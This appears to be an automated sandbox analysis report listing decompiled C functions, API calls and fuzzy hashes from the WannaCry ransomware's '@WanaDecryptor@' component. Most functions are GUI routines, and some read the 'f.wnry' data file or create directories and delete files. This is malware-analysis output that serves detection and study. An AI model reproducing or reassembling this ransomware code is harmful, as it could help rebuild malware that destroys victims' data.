                                  				 *((intOrPtr*)(__ecx + 0xa0)) = 0x415a58;
                                  				 *((intOrPtr*)(__ecx + 0xe4)) = 0;
                                  				 *((intOrPtr*)(__ecx + 0xe0)) = 0x415a44;
                                  				 *((intOrPtr*)(__ecx + 0xf0)) = 0;
                                  				 *((intOrPtr*)(__ecx + 0xec)) = 0x415a30;
                                  				 *((intOrPtr*)(__ecx)) = 0x415958;
                                  				 *((intOrPtr*)(__ecx + 0xf4)) = 0;
                                  				 *[fs:0x0] = _v20;
                                  				return __ecx;
                                  			}

                                  APIs
                                  • #324.MFC42(0000008A,?,?,?,?,?,?,004135B3,000000FF), ref: 00403109
                                  • #567.MFC42(0000008A,?,?,?,?,?,?,004135B3,000000FF), ref: 00403119
                                  • #567.MFC42(0000008A,?,?,?,?,?,?,004135B3,000000FF), ref: 00403131
                                  Strings
                                  Yara matches
                                  Similarity
                                  • API ID: #567$#324
                                  • String ID: 0ZA$DZA
                                  • API String ID: 784016053-3838179817
                                  • Opcode ID: 6530db1bbd0e405eb5314e304be7278bbea559453e8c1a2ce06ca27fee27d17e
                                  • Instruction ID: 8222d1989983ac506c5d09346421d66fb4ae1402eeff5ebed15e971907ed65db
                                  • Opcode Fuzzy Hash: 6530db1bbd0e405eb5314e304be7278bbea559453e8c1a2ce06ca27fee27d17e
                                  • Instruction Fuzzy Hash: 430169B1244B42CBD310CF19C580BDAFBE4FB84750F90892EE1AA9B741C3B864458B9A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 58%
                                  			E00404C40(intOrPtr __ecx, intOrPtr _a4) {
                                  				char _v12;
                                  				intOrPtr _v16;
                                  				intOrPtr _v24;
                                  				intOrPtr _t24;
                                  
                                  				_push(0xffffffff);
                                  				_push(E00413809);
                                  				_push( *[fs:0x0]);
                                  				 *[fs:0x0] = _t24;
                                  				_push(__ecx);
                                  				_push(_a4);
                                  				_push(0x89);
                                  				_v16 = __ecx;
                                  				L00412C92();
                                  				_v12 = 0;
                                  				L00412DA6();
                                  				 *((intOrPtr*)(__ecx + 0x68)) = 0;
                                  				 *((intOrPtr*)(__ecx + 0x64)) = 0x415a44;
                                  				 *((intOrPtr*)(__ecx + 0x74)) = 0;
                                  				 *((intOrPtr*)(__ecx + 0x70)) = 0x415a30;
                                  				_push(0x421798);
                                  				_v12 = 3;
                                  				 *((intOrPtr*)(__ecx)) = 0x415ec8;
                                  				L00412DA0();
                                  				 *[fs:0x0] = _v24;
                                  				return __ecx;
                                  			}

                                  APIs
                                  • #324.MFC42(00000089,?,?,?,?,?,00413809,000000FF), ref: 00404C68
                                  • #540.MFC42(00000089,?,?,?,?,?,00413809,000000FF), ref: 00404C7A
                                  • #860.MFC42(00421798), ref: 00404CAD
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #324#540#860
                                  • String ID: 0ZA$DZA
                                  • API String ID: 1048258301-3838179817
                                  • Opcode ID: b0cfd1353d7ceadba60806c011dda0c8f49be3dfc720069eeb22ffbda53a051c
                                  • Instruction ID: 18ed51ee5778a88a9d54698e5e0d11c9dbfb79b85878934ba46accb8ddaa74ae
                                  • Opcode Fuzzy Hash: b0cfd1353d7ceadba60806c011dda0c8f49be3dfc720069eeb22ffbda53a051c
                                  • Instruction Fuzzy Hash: 880169B1644B50DBD311DF09D605BAABBE4FBD1B24F004A1EF1928B790C7BC95488BDA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 78%
                                  			E00408B40(intOrPtr __ecx) {
                                  				char _v4;
                                  				intOrPtr _v12;
                                  				intOrPtr* _v16;
                                  				intOrPtr _v20;
                                  				intOrPtr _t23;
                                  				int _t25;
                                  				intOrPtr _t30;
                                  				int _t38;
                                  				int _t41;
                                  				intOrPtr* _t43;
                                  				int _t45;
                                  				intOrPtr _t47;
                                  				struct HDC__* _t50;
                                  				intOrPtr _t52;
                                  
                                  				_push(0xffffffff);
                                  				_push(E0041407B);
                                  				_push( *[fs:0x0]);
                                  				 *[fs:0x0] = _t52;
                                  				_t47 = __ecx;
                                  				_v20 = __ecx;
                                  				 *((intOrPtr*)(__ecx)) = 0x4166e0;
                                  				_t23 =  *((intOrPtr*)(__ecx + 0x30));
                                  				_t50 = 0;
                                  				_v4 = 1;
                                  				if(_t23 == 0) {
                                  					 *((intOrPtr*)(__ecx + 8)) = 0;
                                  					 *(__ecx + 4) = 0;
                                  				} else {
                                  					_t41 =  *(__ecx + 0x24);
                                  					_t45 =  *(__ecx + 0x20);
                                  					_t25 =  *((intOrPtr*)(__ecx + 0x2c)) - _t41;
                                  					_t38 =  *((intOrPtr*)(__ecx + 0x28)) - _t45;
                                  					_t30 =  *((intOrPtr*)(__ecx + 0x1c));
                                  					if(__ecx != 0) {
                                  						_t50 =  *(__ecx + 4);
                                  					}
                                  					BitBlt( *(_t30 + 4), _t45, _t41, _t38, _t25, _t50, _t45, _t41, 0xcc0020);
                                  					_t23 =  *((intOrPtr*)(_t47 + 0x18));
                                  					if(_t23 != 0) {
                                  						_t23 =  *((intOrPtr*)(_t23 + 4));
                                  						_push(_t23);
                                  						_push( *((intOrPtr*)(_t47 + 4)));
                                  						L00412E48();
                                  					} else {
                                  						_push(_t23);
                                  						_push( *((intOrPtr*)(_t47 + 4)));
                                  						L00412E48();
                                  					}
                                  				}
                                  				_t43 = _t47 + 0x10;
                                  				_v16 = _t43;
                                  				 *_t43 = 0x415c00;
                                  				_v4 = 2;
                                  				L00412D52();
                                  				 *_t43 = 0x415bec;
                                  				_v4 = 0xffffffff;
                                  				L00412E3C();
                                  				 *[fs:0x0] = _v12;
                                  				return _t23;
                                  			}

















                                  APIs
                                  • BitBlt.GDI32(?,?,00000001,?,?,00000000,?,00000001,00CC0020), ref: 00408BA7
                                  • #5785.MFC42(?,?,?,?,?,?,?,?,?,?,0041407B,000000FF), ref: 00408BBA
                                  • #5785.MFC42(?,?,?,?,?,?,?,?,?,?,0041407B,000000FF), ref: 00408BC9
                                  • #2414.MFC42(?,?,?,?,?,?,?,?,0041407B,000000FF), ref: 00408BEA
                                  • #640.MFC42(?,?,?,?,?,?,?,?,0041407B,000000FF), ref: 00408BFF
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #5785$#2414#640
                                  • String ID:
                                  • API String ID: 2719443296-0
                                  • Opcode ID: 455b206eaea57f198628315411046c596a923de9ec41dd3bd07dbbe9fd6cacce
                                  • Instruction ID: 86c9330ab4234590f1f3c164cda9a19739b95e23c8a4d3600225c259667158ab
                                  • Opcode Fuzzy Hash: 455b206eaea57f198628315411046c596a923de9ec41dd3bd07dbbe9fd6cacce
                                  • Instruction Fuzzy Hash: E1215CB5200B419FC324DF1ACA44A67FBE8EB88710F008A1EF59697781D7B8F8458B65
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 68%
                                  			E00404530(void* __ecx) {
                                  				intOrPtr _v8;
                                  				intOrPtr _v12;
                                  				struct HDC__* _v32;
                                  				void* _v36;
                                  				struct tagSIZE _v48;
                                  				void* _v56;
                                  				intOrPtr _v60;
                                  				intOrPtr _v64;
                                  				int _t21;
                                  				void* _t22;
                                  				intOrPtr _t41;
                                  
                                  				_push(0xffffffff);
                                  				_push(E004137C8);
                                  				_push( *[fs:0x0]);
                                  				 *[fs:0x0] = _t41;
                                  				_t21 =  *((intOrPtr*)(__ecx + 0x5a));
                                  				if(_t21 == 0) {
                                  					_t21 =  *((intOrPtr*)(__ecx + 0x58));
                                  					if(_t21 != 0) {
                                  						_push(__ecx);
                                  						L00412DEE();
                                  						_t22 = __ecx + 0x48;
                                  						_push(_t22);
                                  						_v8 = 0;
                                  						L00412DCA();
                                  						_t21 = GetTextExtentPoint32A(_v32,  *(__ecx + 0x40),  *( *(__ecx + 0x40) - 8),  &_v48);
                                  						 *((intOrPtr*)(__ecx + 0x50)) = _v64;
                                  						_push(_t22);
                                  						 *((intOrPtr*)(__ecx + 0x54)) = _v60;
                                  						L00412DCA();
                                  						 *((char*)(__ecx + 0x5a)) = 1;
                                  						_v32 = 0xffffffff;
                                  						L00412DE8();
                                  					}
                                  				}
                                  				 *[fs:0x0] = _v12;
                                  				return _t21;
                                  			}














                                  APIs
                                  • #289.MFC42 ref: 0040455F
                                  • #5789.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004137C8), ref: 00404574
                                  • GetTextExtentPoint32A.GDI32(?,?,?,?), ref: 0040458D
                                  • #5789.MFC42(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004045A6
                                  • #613.MFC42 ref: 004045BB
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #5789$#289#613ExtentPoint32Text
                                  • String ID:
                                  • API String ID: 888490064-0
                                  • Opcode ID: a47064995aa8a6f4e8062305d7bd768f80382afea7fbb3e7ed5e4407e76e675d
                                  • Instruction ID: e6b376e8f5faa3704f84febb4d8b873e9abde4cd399f019e979504a664a0483f
                                  • Opcode Fuzzy Hash: a47064995aa8a6f4e8062305d7bd768f80382afea7fbb3e7ed5e4407e76e675d
                                  • Instruction Fuzzy Hash: C8119DB5108780AFC310DF18D980B97BBE8EB88714F044A1DF49293681C7B8A845CB22
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 71%
                                  			E00406CF0(void* __ecx, intOrPtr _a4) {
                                  				int _v12;
                                  				intOrPtr _v20;
                                  				void* _v28;
                                  				char _v36;
                                  				intOrPtr _v40;
                                  				void* _v48;
                                  				struct HWND__* _t16;
                                  				void* _t21;
                                  				void* _t34;
                                  				intOrPtr _t36;
                                  
                                  				_push(0xffffffff);
                                  				_push(E00413E78);
                                  				_push( *[fs:0x0]);
                                  				 *[fs:0x0] = _t36;
                                  				_t34 = __ecx;
                                  				_t16 = __ecx + 0x4c0;
                                  				if(_t16 != 0) {
                                  					_t16 =  *(_t16 + 0x20);
                                  				}
                                  				SendMessageA(_t16, 0x445, 0, 0x4000000);
                                  				_push(0);
                                  				_push(_a4);
                                  				L00412F44();
                                  				_v12 = 0;
                                  				_v48 =  &_v36;
                                  				_v40 = E00406DA0;
                                  				SendMessageA( *(_t34 + 0x4e0), 0x449, 2,  &_v48);
                                  				L00412F3E();
                                  				_t21 = E00406DC0(_t34);
                                  				_v12 = 0xffffffff;
                                  				L00412F38();
                                  				 *[fs:0x0] = _v20;
                                  				return _t21;
                                  			}













                                  APIs
                                  • SendMessageA.USER32(?,00000445,00000000,04000000), ref: 00406D2C
                                  • #353.MFC42(?,00000000,?,?,?,?,?,?,?,?,?,?,765920C0), ref: 00406D39
                                  • SendMessageA.USER32 ref: 00406D69
                                  • #1979.MFC42 ref: 00406D6F
                                  • #665.MFC42 ref: 00406D87
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MessageSend$#1979#353#665
                                  • String ID:
                                  • API String ID: 3794212480-0
                                  • Opcode ID: 3e8137c70926b1d8ee173e5193f7a8fccbc7f675bb9cd6243914618cf2aa9b36
                                  • Instruction ID: 970bbd2b9484f858b006173e4a833a93101fbe0026f1fdcd253c6fb41473c1ec
                                  • Opcode Fuzzy Hash: 3e8137c70926b1d8ee173e5193f7a8fccbc7f675bb9cd6243914618cf2aa9b36
                                  • Instruction Fuzzy Hash: EA1170B1244701AFD210EF15C942F9BB7E4BF94B14F504A1EF156A72C0C7B8A905CB5A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 58%
                                  			E00407DB0(void* __eflags) {
                                  				intOrPtr _v4;
                                  				intOrPtr _v8;
                                  				intOrPtr _v12;
                                  				intOrPtr _v28;
                                  				intOrPtr _v32;
                                  				intOrPtr _v36;
                                  				void* _v100;
                                  				char _v196;
                                  				void* _t14;
                                  				intOrPtr _t16;
                                  				intOrPtr _t22;
                                  				void* _t23;
                                  				intOrPtr* _t24;
                                  				intOrPtr _t26;
                                  				void* _t28;
                                  
                                  				 *[fs:0x0] = _t26;
                                  				E00401000( &_v196, 0);
                                  				_t24 = __imp__time;
                                  				_v8 = 0;
                                  				_t14 =  *_t24(0, _t23,  *[fs:0x0], E00413FA6, 0xffffffff);
                                  				_t22 =  *0x4218a0; // 0x0
                                  				_t28 = _t26 - 0xb8 + 4;
                                  				if(_t14 - _t22 < 0x12c) {
                                  					_v36 = 0;
                                  				}
                                  				_v32 = 0;
                                  				L00412B72();
                                  				_t16 = _v28;
                                  				if(_t16 >= 0) {
                                  					_t16 =  *_t24(0);
                                  					_t28 = _t28 + 4;
                                  					 *0x4218a0 = _t16;
                                  				}
                                  				 *0x4218a4 =  *0x4218a4 + 1;
                                  				_v4 = 1;
                                  				L00412C9E();
                                  				_v4 = 0xffffffff;
                                  				L00412C86();
                                  				 *[fs:0x0] = _v12;
                                  				return _t16;
                                  			}


















                                  APIs
                                    • Part of subcall function 00401000: #324.MFC42(0000008D,?,?,?,?,?,?,00413458,000000FF), ref: 00401029
                                    • Part of subcall function 00401000: #567.MFC42(0000008D,?,?,?,?,?,?,00413458,000000FF), ref: 00401039
                                  • time.MSVCRT ref: 00407DEA
                                  • #2514.MFC42 ref: 00407E18
                                  • time.MSVCRT ref: 00407E2A
                                  • #765.MFC42 ref: 00407E49
                                  • #641.MFC42 ref: 00407E5D
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: time$#2514#324#567#641#765
                                  • String ID:
                                  • API String ID: 3372871541-0
                                  • Opcode ID: b8401119eccb86975bd1eb41a25b1802afd83000c8f18fd8393192857fb5272d
                                  • Instruction ID: 27345a9b2c1eb8b6f7bb2a745056f56b64ece2280f016bc8de7da71c9126f67a
                                  • Opcode Fuzzy Hash: b8401119eccb86975bd1eb41a25b1802afd83000c8f18fd8393192857fb5272d
                                  • Instruction Fuzzy Hash: 4C11AD70A097809FE320EF24CA41BDA77E0BB94714F40462EE589872D0EB786445CB97
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 86%
                                  			E004031A0(intOrPtr __ecx) {
                                  				char _v4;
                                  				intOrPtr _v12;
                                  				intOrPtr* _v16;
                                  				intOrPtr _v20;
                                  				intOrPtr _t15;
                                  				intOrPtr* _t24;
                                  				intOrPtr* _t25;
                                  				intOrPtr _t30;
                                  
                                  				_push(0xffffffff);
                                  				_push(E004135FF);
                                  				_t15 =  *[fs:0x0];
                                  				_push(_t15);
                                  				 *[fs:0x0] = _t30;
                                  				_v20 = __ecx;
                                  				_v4 = 0;
                                  				_t24 = __ecx + 0xec;
                                  				_v16 = _t24;
                                  				 *_t24 = 0x415c00;
                                  				_v4 = 4;
                                  				L00412D52();
                                  				 *_t24 = 0x415bec;
                                  				_t25 = __ecx + 0xe0;
                                  				_v16 = _t25;
                                  				 *_t25 = 0x415c00;
                                  				_v4 = 5;
                                  				L00412D52();
                                  				 *_t25 = 0x415bec;
                                  				_v4 = 1;
                                  				L00412D4C();
                                  				_v4 = 0;
                                  				L00412D3A();
                                  				_v4 = 0xffffffff;
                                  				L00412C86();
                                  				 *[fs:0x0] = _v12;
                                  				return _t15;
                                  			}











                                  APIs
                                  • #2414.MFC42(?,?,?,?,?,?,?,00403188), ref: 004031DF
                                  • #2414.MFC42(?,?,?,?,?,?,?,00403188), ref: 00403201
                                  • #616.MFC42(?,?,?,?,?,?,?,00403188), ref: 00403217
                                  • #693.MFC42(?,?,?,?,?,?,?,00403188), ref: 00403224
                                  • #641.MFC42(?,?,?,?,?,?,?,00403188), ref: 00403233
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #2414$#616#641#693
                                  • String ID:
                                  • API String ID: 1164084425-0
                                  • Opcode ID: 34bc8b48edd82315a510377cde5f302579feb69e69f968417769f9718486fe20
                                  • Instruction ID: e1576da2e33af18b213473c47bce756763974573e8f92b07b932385a5cbbc76a
                                  • Opcode Fuzzy Hash: 34bc8b48edd82315a510377cde5f302579feb69e69f968417769f9718486fe20
                                  • Instruction Fuzzy Hash: FF112774108B82CAC300DF19C1413CAFBE8AFA5714F54891FE0A6972A2D7F851998BE6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 73%
                                  			E00403AF0(void* __edi, void* __ebp) {
                                  				int _v4;
                                  				intOrPtr _v12;
                                  				char _v1252;
                                  				void _v2251;
                                  				char _v2252;
                                  				int _v2256;
                                  				signed int _t43;
                                  				signed char _t44;
                                  				signed int _t52;
                                  				signed int _t58;
                                  				signed int _t75;
                                  				signed int _t78;
                                  				struct _IO_FILE* _t103;
                                  				intOrPtr _t111;
                                  				void* _t113;
                                  
                                  				_push(0xffffffff);
                                  				_push(E0041369B);
                                  				_push( *[fs:0x0]);
                                  				 *[fs:0x0] = _t111;
                                  				_t103 = fopen("f.wnry", "rt");
                                  				_t113 = _t111 - 0x8c4 + 8;
                                  				if(_t103 != 0) {
                                  					E00401E90( &_v1252, __eflags);
                                  					_v4 = 0;
                                  					_t43 = E00402020( &_v1252, 0, E00403810, 0);
                                  					__eflags = _t43;
                                  					if(_t43 != 0) {
                                  						_t44 =  *(_t103 + 0xc);
                                  						_v2256 = 0;
                                  						__eflags = _t44 & 0x00000010;
                                  						if((_t44 & 0x00000010) == 0) {
                                  							while(1) {
                                  								_v2252 = 0;
                                  								memset( &_v2251, 0, 0xf9 << 2);
                                  								asm("stosw");
                                  								asm("stosb");
                                  								_t52 = fgets( &_v2252, 0x3e7, _t103);
                                  								_t113 = _t113 + 0x18;
                                  								__eflags = _t52;
                                  								if(_t52 == 0) {
                                  									break;
                                  								}
                                  								asm("repne scasb");
                                  								_t75 = 0xbadbac;
                                  								__eflags = 0xbadbac;
                                  								if(0xbadbac != 0) {
                                  									while(1) {
                                  										asm("repne scasb");
                                  										_t78 =  !(_t75 | 0xffffffff) - 1;
                                  										__eflags =  *((char*)(_t113 + _t78 + 0x13)) - 0xd;
                                  										if( *((char*)(_t113 + _t78 + 0x13)) == 0xd) {
                                  											goto L10;
                                  										}
                                  										L9:
                                  										asm("repne scasb");
                                  										_t78 =  !(_t78 | 0xffffffff) - 1;
                                  										__eflags =  *((char*)(_t113 + _t78 + 0x13)) - 0xa;
                                  										if( *((char*)(_t113 + _t78 + 0x13)) == 0xa) {
                                  											goto L10;
                                  										}
                                  										asm("repne scasb");
                                  										__eflags =  !(_t78 | 0xffffffff) != 1;
                                  										if( !(_t78 | 0xffffffff) != 1) {
                                  											_t58 = E00402650( &_v1252,  &_v2252);
                                  											__eflags = _t58;
                                  											if(_t58 != 0) {
                                  												_t29 =  &_v2256;
                                  												 *_t29 = _v2256 + 1;
                                  												__eflags =  *_t29;
                                  											}
                                  										}
                                  										goto L14;
                                  										L10:
                                  										asm("repne scasb");
                                  										_t75 =  !(_t78 | 0xffffffff) - 1;
                                  										 *((char*)(_t113 + _t75 + 0x13)) = 0;
                                  										asm("repne scasb");
                                  										_t78 =  !(_t75 | 0xffffffff) - 1;
                                  										__eflags =  *((char*)(_t113 + _t78 + 0x13)) - 0xd;
                                  										if( *((char*)(_t113 + _t78 + 0x13)) == 0xd) {
                                  											goto L10;
                                  										}
                                  										goto L9;
                                  									}
                                  								}
                                  								L14:
                                  								__eflags =  *(_t103 + 0xc) & 0x00000010;
                                  								if(( *(_t103 + 0xc) & 0x00000010) == 0) {
                                  									continue;
                                  								}
                                  								break;
                                  							}
                                  						}
                                  						fclose(_t103);
                                  						__eflags = _v2256;
                                  						_t36 = _v2256 > 0;
                                  						__eflags = _t36;
                                  						_v4 = 0xffffffff;
                                  						E00401F30( &_v1252);
                                  						 *[fs:0x0] = _v12;
                                  						return 0 | _t36;
                                  					} else {
                                  						_v4 = 0xffffffff;
                                  						E00401F30( &_v1252);
                                  						__eflags = 0;
                                  						 *[fs:0x0] = _v12;
                                  						return 0;
                                  					}
                                  				} else {
                                  					 *[fs:0x0] = _v12;
                                  					return 0;
                                  				}
                                  			}



















                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: fopen
                                  • String ID: f.wnry
                                  • API String ID: 1432627528-2448388194
                                  • Opcode ID: cf48eaa19fa84c87f31c2d63a6b3fa47abbd49c5c0666401f46844b5b3827a14
                                  • Instruction ID: 4eb239c0cb280e6f7c3b00bdc2b89ffa7a6027cf1f229c631d6900f059da94bf
                                  • Opcode Fuzzy Hash: cf48eaa19fa84c87f31c2d63a6b3fa47abbd49c5c0666401f46844b5b3827a14
                                  • Instruction Fuzzy Hash: CF410B311087415BE324DF3899417ABBBD4FB80321F144A3EF4E6B22C1DF789A088796
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0040B6A0(CHAR* _a4, CHAR* _a8, intOrPtr _a12) {
                                  				char _v520;
                                  				void _v816;
                                  				struct _SECURITY_ATTRIBUTES* _v820;
                                  				void* _t15;
                                  				struct _SECURITY_ATTRIBUTES* _t37;
                                  				CHAR* _t38;
                                  				void* _t39;
                                  				CHAR* _t40;
                                  				struct _SECURITY_ATTRIBUTES** _t42;
                                  				struct _SECURITY_ATTRIBUTES** _t44;
                                  
                                  				_t40 = _a4;
                                  				CreateDirectoryA(_t40, 0);
                                  				_t38 = _a8;
                                  				_t15 = E00412920(_t38, _a12);
                                  				_t28 = _t15;
                                  				_t42 =  &(( &_v820)[2]);
                                  				if(_t15 != 0) {
                                  					_v820 = 0;
                                  					memset( &_v816, 0, 0x4a << 2);
                                  					E00412940(_t28, 0xffffffff,  &_v820);
                                  					_t37 = _v820;
                                  					_t44 =  &(_t42[6]);
                                  					if(_t37 > 0) {
                                  						_t39 = 0;
                                  						if(_t37 > 0) {
                                  							do {
                                  								E00412940(_t28, _t39,  &_v820);
                                  								sprintf( &_v520, "%s\\%s", _t40,  &_v816);
                                  								E004129E0(_t28, _t39,  &_v520);
                                  								_t44 =  &(_t44[0xa]);
                                  								_t39 = _t39 + 1;
                                  							} while (_t39 < _t37);
                                  						}
                                  						E00412A00(_t28);
                                  						return 1;
                                  					} else {
                                  						return 0;
                                  					}
                                  				} else {
                                  					DeleteFileA(_t38);
                                  					return 0;
                                  				}
                                  			}














                                  APIs
                                  • CreateDirectoryA.KERNEL32(?,00000000,?,76C53310,00000000,00000428), ref: 0040B6B4
                                  • DeleteFileA.KERNEL32(?), ref: 0040B6D9
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateDeleteDirectoryFile
                                  • String ID: %s\%s
                                  • API String ID: 3195586388-4073750446
                                  • Opcode ID: 9867dcfa113bb228f6e7ce7fcc7c959ecb5fe08f48f21d4d20f526cefea80cd3
                                  • Instruction ID: 62764616b0dad41b6f02366a4e891bd604a257d4ac44bdf0c04ae484a2ff6343
                                  • Opcode Fuzzy Hash: 9867dcfa113bb228f6e7ce7fcc7c959ecb5fe08f48f21d4d20f526cefea80cd3
                                  • Instruction Fuzzy Hash: 2F2108B620435067D620AB65EC81AEB779CEBC4324F44082EFD1892242E77D661D82FA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 74%
                                  			E0040D150(int __eax, intOrPtr* __ecx, void* __edi, char _a4, char _a8, char _a12, intOrPtr* _a16) {
                                  				char _v500;
                                  				intOrPtr _v508;
                                  				char _v520;
                                  				char _v521;
                                  				char _v528;
                                  				char _v529;
                                  				intOrPtr _v536;
                                  				signed int _t42;
                                  				short _t46;
                                  				signed int _t48;
                                  				int _t62;
                                  				intOrPtr* _t63;
                                  				intOrPtr _t67;
                                  				intOrPtr _t81;
                                  				void* _t82;
                                  				void* _t83;
                                  				void* _t89;
                                  				void* _t94;
                                  				intOrPtr* _t95;
                                  				void* _t97;
                                  				void* _t99;
                                  
                                  				_t89 = __edi;
